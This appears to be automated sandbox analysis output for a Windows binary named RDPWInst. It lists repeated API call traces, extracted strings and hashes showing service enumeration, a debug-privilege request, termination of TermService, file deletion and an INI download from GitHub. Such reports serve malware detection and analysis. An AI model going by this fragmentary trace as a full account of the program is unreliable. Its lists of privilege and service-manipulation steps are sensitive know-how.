                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                                                  • Opcode ID: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                                                                                                  • Instruction ID: c99ab9519c0edb256345e3c1c1fceae5193512a11a1c4a98270a3cb03c9355dc
                                                                                                                                  • Opcode Fuzzy Hash: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                                                                                                  • Instruction Fuzzy Hash: 25412575A4C2085A5305AB6EB8018FA77B9DA86324374D07FF5088B745DF7CACC2876D
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE85
                                                                                                                                  • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE90
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AED6
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE2
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastOpenService$CloseHandleManager
                                                                                                                                  • String ID: $sD$...$ServicesActive$[*] Checking $[-] OpenSCManager error (code $[-] OpenService error (code $[-] QueryServiceConfig error (code $[-] QueryServiceConfig failed.
                                                                                                                                  • API String ID: 48634454-3812534468
                                                                                                                                  • Opcode ID: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                                                                                                  • Instruction ID: 7a774fc46d996de6837286bf894840c9c95f128f26b1d3a09438fbe6509dfab0
                                                                                                                                  • Opcode Fuzzy Hash: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                                                                                                  • Instruction Fuzzy Hash: 41418FA4A08200AAD711F7B68C42A5F76A99F88308F11917BB514B6293CB3CAD01967F
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                                                                    • Part of subcall function 0043B7D4: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                                                                                                    • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                                                                                                    • Part of subcall function 0043B7D4: EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                                                                                                    • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                                                                                                    • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                                                                                                    • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                                                                                                    • Part of subcall function 0043BF00: GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                                                                                                    • Part of subcall function 0043BF00: OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                                                                                                    • Part of subcall function 0043BF00: GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                                                                                                    • Part of subcall function 0043C1C8: OpenProcess.KERNEL32(00000001,00000000,0000061C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                                                                                                    • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000001,00000000,0000061C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                                                                                                    • Part of subcall function 0043C1C8: TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,0000061C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                                                                                                    • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,0000061C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                                                                                                    • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,0000061C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                                                                                                    • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,0000061C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                                                                                                  • Sleep.KERNEL32(000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043F9CC
                                                                                                                                  • Sleep.KERNEL32(000001F4,000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043FA09
                                                                                                                                    • Part of subcall function 0043B58C: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                                                                                                    • Part of subcall function 0043B58C: GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CloseHandleOpenProcess$ManagerServiceSleep$CurrentEnumEnvironmentExpandServicesStatusStringsTerminateToken
                                                                                                                                  • String ID: $sD$%d.%.2d.%.2d$SeDebugPrivilege$TermService$[*] Current update date: $[*] Everything is up to date.$[*] Latest update date: $[*] Terminating service...$[*] Your INI file is newer than public file. Are you a developer? :)$[+] New update is available, updating...$[+] Update completed.$[-] Failed to download latest INI from GitHub.$rdpwrap.ini
                                                                                                                                  • API String ID: 3534747103-2332903941
                                                                                                                                  • Opcode ID: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                                                                                                  • Instruction ID: 35adde3c6c2359a68fd4b220f91aa0339034fd12c6c7055d874297ef65b27e77
                                                                                                                                  • Opcode Fuzzy Hash: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                                                                                                  • Instruction Fuzzy Hash: D5813074E042099BDB04FBA9D48169DB7B1EF8D308F51507AF504F7392DB38AD058B6A
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D985
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D98E
                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA04
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA0D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DeleteErrorFileLast$EnvironmentExpandStrings
                                                                                                                                  • String ID: $sD$[+] Removed file: $[+] Removed folder: $[-] DeleteFile error (code $[-] RemoveDirectory error (code $rdpwrap.ini
                                                                                                                                  • API String ID: 1427661212-4281953003
                                                                                                                                  • Opcode ID: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                                                                                                  • Instruction ID: ad05ad182a3b94ca814d20fd028ad2e32e4b81082960bb03fd6afff070a44f54
                                                                                                                                  • Opcode Fuzzy Hash: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                                                                                                  • Instruction Fuzzy Hash: 31414F74A042049BDB00F7B6D94286EB375AF8D308F52813BF500B7697DA3CBD059A6E
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041325C: VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                                                                                                    • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                                                                                                    • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                                                                                                    • Part of subcall function 0041325C: LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,00413571), ref: 004134AD
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134E0
                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F2
                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F8
                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041350C
                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 00413512
                                                                                                                                  • LoadStringW.USER32(00000000,0000FFE6,?,00000040), ref: 00413536
                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00002010), ref: 00413550
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                                                                  • String ID: $sD$(4A$LpD
                                                                                                                                  • API String ID: 135118572-2961882766
                                                                                                                                  • Opcode ID: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                                                                                                  • Instruction ID: ef224b53181cf2408eecbf6e4a49f74db113686e973540ee16aa2e1e81a8a81f
                                                                                                                                  • Opcode Fuzzy Hash: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                                                                                                  • Instruction Fuzzy Hash: E4315E71640204BEE710EBA5DC82FDA73BDEB05B05F50417AB604F61D1DE78AE808B69
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00409F3F
                                                                                                                                  • GetLastError.KERNEL32(?), ref: 00409F4A
                                                                                                                                  • RaiseException.KERNEL32(C0FB007E,00000000,00000001,?), ref: 00409F80
                                                                                                                                  • EnterCriticalSection.KERNEL32(00449C1C), ref: 00409F92
                                                                                                                                  • FreeLibrary.KERNEL32(?,00449C1C), ref: 00409FAA
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00449C1C,?,00449C1C), ref: 00409FB7
                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 0040A026
                                                                                                                                  • GetLastError.KERNEL32 ref: 0040A031
                                                                                                                                  • RaiseException.KERNEL32(C0FB007F,00000000,00000001,?), ref: 0040A067
                                                                                                                                    • Part of subcall function 00409D9C: LocalAlloc.KERNEL32(00000040,00000008), ref: 00409DA8
                                                                                                                                    • Part of subcall function 00409D9C: RaiseException.KERNEL32(C0FB0008,00000000,00000001,?,00000040,00000008), ref: 00409DBD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionRaise$CriticalErrorLastLibrarySection$AddressAllocEnterFreeLeaveLoadLocalProc
                                                                                                                                  • String ID: $
                                                                                                                                  • API String ID: 4255670546-3993045852
                                                                                                                                  • Opcode ID: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                                                                                                  • Instruction ID: e7bef61209e92d946731ec4a4071e7a79c0b4aa0f4738c46576ebf8cfa3b661b
                                                                                                                                  • Opcode Fuzzy Hash: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                                                                                                  • Instruction Fuzzy Hash: EE618D7590070AAFDB21DFA5D885BAFB3B4AF48314F14803AE504B62D2D7789D44CB59
                                                                                                                                  APIs
                                                                                                                                  • MessageBoxA.USER32(00000000,?,004026E0,00002010), ref: 00403F39
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message
                                                                                                                                  • String ID: $$zD$$zD$7$D&@$l&@$zPD$&@
                                                                                                                                  • API String ID: 2030045667-2939321579
                                                                                                                                  • Opcode ID: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                                                                                                  • Instruction ID: 997706f527e00cc568bc624ae0a330c29571725258f71f9dd8560831bc4d878f
                                                                                                                                  • Opcode Fuzzy Hash: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                                                                                                  • Instruction Fuzzy Hash: E5B1B434A042548FDB20DF2DC884B997BE8AB09745F1441FAE449F7382CB799E85CB59
                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00415476,?,?,00000000,00000000), ref: 004151CE
                                                                                                                                    • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                  • API String ID: 4232894706-2493093252
                                                                                                                                  • Opcode ID: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                                                                                                  • Instruction ID: d9a4c13083f090c9220c38b115c8470d0dd0b24888f81dbd48f38483d2476b95
                                                                                                                                  • Opcode Fuzzy Hash: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                                                                                                  • Instruction Fuzzy Hash: C6717E34B005489BDB04EBA5C881BDF73A6DB88308F50843BB201EB39ADA3DDD95975C
                                                                                                                                  APIs
                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004198D5
                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004198F1
                                                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0041992A
                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004199A7
                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004199C0
                                                                                                                                  • VariantCopy.OLEAUT32(?), ref: 004199F5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 351091851-3916222277
                                                                                                                                  • Opcode ID: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                                                                                                  • Instruction ID: 05f3e7187411a66581312748be8f4c599b64c7f757b61d9c7bcf5be2e84cfcbc
                                                                                                                                  • Opcode Fuzzy Hash: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                                                                                                  • Instruction Fuzzy Hash: BB510E75A1061D9BCB62DB59CC91AD9B3BCAF0C314F0041DAE509D7311DA389FC18F69
                                                                                                                                  APIs
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00406208
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
